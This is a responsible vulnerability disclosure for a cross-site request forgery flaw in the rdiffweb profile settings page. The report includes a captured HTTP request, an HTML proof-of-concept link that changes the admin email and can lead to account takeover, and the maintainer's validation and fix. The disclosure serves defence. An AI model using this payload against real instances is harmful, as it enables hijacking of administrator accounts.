CSRF resulting in Account Takeover in ikus060/rdiffweb

Valid

Reported on

Sep 14th 2022


Description

Hello everyone,

Rdiffweb offers a profile section where the admin user can change his informations such as the username, the email etc..., when the admin changes his username and his email; the following POST requests is sent:

POST /prefs/general HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=27c2d6767e8f524663f44191d0a0cf9bac2d45c7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://rdiffweb-demo.ikus-soft.com
Referer: https://rdiffweb-demo.ikus-soft.com/prefs/general
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

username=admin&email=test%40admin.net&action=set_profile_info

the above POST requests isn't protected by an anti-csrf token to prevent CSRF attacks as the software takes a different approach which is setting the SameSite flag to LAX which is somehow helpful but the above request can be sent also using the GET verb so the LAX attribute won't work in this case; an attacker would host an HTML page containing an a tag that initiates a request to the vulnerable endpoint once it's clicked !

Proof of Concept

<html>
        <body>
                 <a href="https://rdiffweb-demo.ikus-soft.com/prefs/general?username=admin&email=test%40admin.net&action=set_profile_info">Click Here !</a>
        </body>
</html>

Impact

the CSRF targets a critical function (email changing) so this could result in an Account Takeover ...

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. 8 days ago
ikus060/rdiffweb maintainer has acknowledged this report 8 days ago
Patrik Dufresne validated this vulnerability 8 days ago

Your vulnerability report is valid.

Moad Akhraz has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne confirmed that a fix has been merged on f10ead 8 days ago
Patrik Dufresne has been awarded the fix bounty
to join this conversation